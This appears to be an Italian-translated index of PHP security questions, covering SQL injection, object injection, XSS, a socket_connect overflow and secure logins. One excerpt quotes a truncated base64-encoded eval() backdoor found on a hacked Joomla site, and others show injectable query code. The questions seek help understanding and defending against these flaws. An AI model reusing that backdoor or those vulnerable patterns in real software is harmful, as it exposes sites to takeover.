Le migliori php

2

risposte

Il mio codice utilizza mysqli_real_escape_string e cita il 100% sicuro contro SQL Injection?

Il mio codice è: SELECT * FROM tlb_members WHERE username="{mysqli_real_escape_string($_GET['test'])}" Sto cercando e alcune persone hanno detto che usare le virgolette nelle istruzioni SQL è sicuro. È vero?

posta 07.03.2016 - 07:14

2

risposte

PHP socket_connect Stack Overflow

Nella descizione della vulnerabilità: Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary code via a long pathname for a...

posta 04.04.2012 - 00:08

4

risposte

SQL Injection con passaggio MD5

Voglio sapere, se nel mio modulo di accesso è possibile un'iniezione SQL. Se esiste, quale potrebbe essere la voce del modulo Web di exploit? Invio nome utente e password in formato html (POST). Il codice della funzione di accesso è: $userna...

posta 13.09.2013 - 16:59

2

risposte

Come creare un sistema di accesso sicuro con i cookie? [chiuso]

Per la mia educazione personale, sto cercando di creare un sistema di accesso sicuro usando i cookie. Ho letto molti articoli e domande Stack Overflow su come ottenerlo, ma non ho trovato nulla di utile. Ognuno suggerisce diversi modi per raggiu...

posta 09.12.2015 - 05:45

1

risposta

Dati del quiz crittografati in PHP e JS

Sto sviluppando un quiz con il quale puoi vincere alcuni fantastici premi. Quindi temo che qualcuno possa provare a modificarlo / manipolarlo. Tutti i partecipanti devono essere loggati e il sito web prende 15 domande dal db, da loro a Javasc...

posta 23.01.2015 - 11:59

5

risposte

Sito backdoor & eval ()

Gestisco un sito Joomla 1.7 che è stato hackerato oggi. Sotto lo script ha fatto il trucco. eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSF...

posta 21.02.2013 - 10:54

2

risposte

SQL Injection non funziona quando penso che dovrebbe

Sto cercando di conoscere PHP e SQL Injection, quindi ho creato un modulo di login in cui gli utenti introducono il loro nome utente e password e fanno clic sul pulsante Login. Più tardi nel server ottengo i parametri passati usando $ _POST vari...

posta 07.07.2016 - 19:12

2

risposte

Perché funziona questo exploit di PHP object injection?

Ho recentemente creato codice PHP vulnerabile all'iniezione di oggetti. Ecco il codice del mio file one.php dove ho unserialize il parametro data : <?php class utkarsh { public $logfile = "delete.txt"; public $logdata = "...

posta 28.12.2017 - 12:51

5

risposte

Autentica l'utente senza conoscere la sua password

Sto lavorando a un progetto in cui ogni utente avrà una coppia di chiavi RSA pubblica / privata. Gli utenti saranno in grado di inviare messaggi crittografati l'un l'altro utilizzando la chiave pubblica di ciascun utente di destinazione in modo...

posta 04.12.2013 - 17:21

4

risposte

Come utilizzare la vulnerabilità XSS per leggere il file sul server?

Posso utilizzare una vulnerabilità XSS per leggere i file sul server iniettando il codice PHP nella pagina? Esempio: usa document.write per iniettare il codice PHP che legge il file.

posta 14.07.2016 - 08:19

Domande con tag 'php'